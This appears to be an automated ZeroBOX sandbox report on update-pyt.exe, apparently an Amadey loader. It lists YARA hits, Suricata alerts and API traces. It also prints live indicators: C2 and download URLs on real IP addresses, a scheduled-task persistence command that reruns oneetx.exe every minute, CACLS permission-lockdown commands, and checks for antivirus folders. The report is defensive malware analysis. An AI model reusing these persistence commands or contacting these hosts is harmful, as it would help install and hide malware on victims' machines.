Summary | ZeroBOX

update-pyt.exe

Generic Malware, Malicious Library, Antivirus, UPX, PE File, OS Processor Check, PE32, JPEG Format
Category Machine Started Completed
FILE s1_win7_x6403_us March 27, 2023, 10:18 a.m. March 27, 2023, 10:20 a.m.
Size 13.3MB
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 ba6a75f0c69a7f22b526ad940c3451b4
SHA256 f9065a3e8905c4433fb9df4dbff6a8c6645cfb12291dcdc1a3e7148f46e2762e
CRC32 C6656742
ssdeep 393216:Ow1YoG53jQu7j/ZFztE4Fg1EFoK2Er/QG7fal7a:OsYtTjC4Fg1s2Erlf
Yara
  • UPX_Zero - UPX packed file
  • Malicious_Library_Zero - Malicious_Library
  • Generic_Malware_Zero - Generic Malware
  • Win32_Trojan_Gen_2_0904B0_Zero - Win32 Trojan Gen
  • OS_Processor_Check_Zero - OS Processor Check
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49171 -> 78.46.242.112:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 79.137.248.23:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 79.137.248.23:80 -> 192.168.56.103:49173 2014819 ET INFO Packed Executable Download Misc activity
TCP 79.137.248.23:80 -> 192.168.56.103:49173 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 79.137.248.23:80 -> 192.168.56.103:49173 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 79.137.248.23:80 -> 192.168.56.103:49173 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 79.137.248.23:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 79.137.248.23:80 -> 192.168.56.103:49179 2014819 ET INFO Packed Executable Download Misc activity
TCP 79.137.248.23:80 -> 192.168.56.103:49179 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 79.137.248.23:80 -> 192.168.56.103:49179 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 79.137.248.23:80 -> 192.168.56.103:49179 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.3 192.168.56.103:49185 -> 172.217.24.68:443 None None None
TLS 1.3 192.168.56.103:49184 -> 172.217.24.68:443 None None None
TLS 1.3 192.168.56.103:49187 -> 142.251.220.3:443 None None None
TLS 1.3 192.168.56.103:49182 -> 142.251.220.3:443 None None None
TLS 1.3 192.168.56.103:49188 -> 142.251.220.45:443 None None None
TLS 1.3 192.168.56.103:49186 -> 172.217.24.68:443 None None None
TLS 1.3 192.168.56.103:49194 -> 172.217.27.35:443 None None None
TLS 1.3 192.168.56.103:49199 -> 142.250.204.142:443 None None None
TLS 1.3 192.168.56.103:49200 -> 216.58.200.227:443 None None None
TLS 1.3 192.168.56.103:49201 -> 142.250.204.65:443 None None None
TLS 1.3 192.168.56.103:49202 -> 172.217.24.238:443 None None None
TLS 1.3 192.168.56.103:49183 -> 142.251.220.45:443 None None None
TLS 1.3 192.168.56.103:49189 -> 172.217.24.68:443 None None None
TLS 1.3 192.168.56.103:49193 -> 142.250.66.138:443 None None None
TLS 1.3 192.168.56.103:49198 -> 142.250.204.67:443 None None None
TLS 1.3 192.168.56.103:49190 -> 34.120.48.173:443 None None None
TLS 1.3 192.168.56.103:49195 -> 172.217.27.35:443 None None None
UNDETERMINED 192.168.56.103:49196 -> 172.217.27.35:443 None None None

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "oneetx.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section rdata0
section rdata1
section rdata2
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://78.46.242.112/so57Nst/index.php
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://78.46.242.112/so57Nst/index.php?scr=1
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://79.137.248.23/RedHat.exe
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://91.107.196.27/75e7ead3c17835de.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://79.137.248.23/Lamb.pif.exe
request POST http://78.46.242.112/so57Nst/index.php
request POST http://78.46.242.112/so57Nst/index.php?scr=1
request GET http://79.137.248.23/RedHat.exe
request POST http://91.107.196.27/75e7ead3c17835de.php
request GET http://79.137.248.23/Lamb.pif.exe
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET http://clients2.google.com/time/1/current?cup2key=4:1168666890&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
request GET http://www.gstatic.com/generate_204
request POST http://78.46.242.112/so57Nst/index.php
request POST http://78.46.242.112/so57Nst/index.php?scr=1
request POST http://91.107.196.27/75e7ead3c17835de.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1820
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 12288
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0124d000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1820
region_size: 258048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
3221225496 0

NtAllocateVirtualMemory

process_identifier: 1820
region_size: 258048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x013d0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 12288
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x013bd000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2056
region_size: 258048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
3221225496 0

NtAllocateVirtualMemory

process_identifier: 2056
region_size: 258048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x011a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3060
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01490000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3060
region_size: 2260992
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
3221225496 0

NtAllocateVirtualMemory

process_identifier: 3060
region_size: 2260992
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c70000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3060
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 57344
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c71000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2356
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 12288
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0154d000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 385024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
3221225496 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 385024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x011e0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\1000092001\Lamb.exe
file C:\Users\test22\AppData\Local\Temp\1000091001\RedHat.exe
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe" /F
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\fd369298e4" /P "test22:N"&&CACLS "..\fd369298e4" /P "test22:R" /E&&Exit
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe" /F
file C:\Users\test22\AppData\Local\Temp\1000091001\RedHat.exe
file C:\Users\test22\AppData\Local\Temp\1000091001\RedHat.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\fd369298e4" /P "test22:N"&&CACLS "..\fd369298e4" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000091001\RedHat.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000091001\RedHat.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000092001\Lamb.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000092001\Lamb.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0
section .rdata: virtual_address 0x00141000, virtual_size 0x0008151c, size_of_data 0x00081600, entropy 7.274767342002277 description A section with a high entropy has been found
section .idata: virtual_address 0x00223000, virtual_size 0x00001a14, size_of_data 0x00001c00, entropy 7.005823451001572 description A section with a high entropy has been found
section rdata0: virtual_address 0x00227000, virtual_size 0x005aa2ca, size_of_data 0x005aa400, entropy 7.931736759904774 description A section with a high entropy has been found
section rdata2: virtual_address 0x007d3000, virtual_size 0x0056fba0, size_of_data 0x0056fc00, entropy 7.942228359505709 description A section with a high entropy has been found
entropy 0.876091200413 description Overall entropy of this PE file is high
cmdline C:\Users\test22\AppData\Local\Temp\1000091001\RedHat.exe
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe" /F
cmdline "C:\Users\test22\AppData\Local\Temp\1000091001\RedHat.exe"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe" /F
host 78.46.242.112
host 79.137.248.23
host 91.107.196.27
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\fd369298e4\oneetx.exe" /F
cmdline CACLS "..\fd369298e4" /P "test22:R" /E
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\fd369298e4" /P "test22:N"&&CACLS "..\fd369298e4" /P "test22:R" /E&&Exit
cmdline CACLS "oneetx.exe" /P "test22:R" /E
cmdline CACLS "oneetx.exe" /P "test22:N"
cmdline cmd /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\fd369298e4" /P "test22:N"&&CACLS "..\fd369298e4" /P "test22:R" /E&&Exit
cmdline CACLS "..\fd369298e4" /P "test22:N"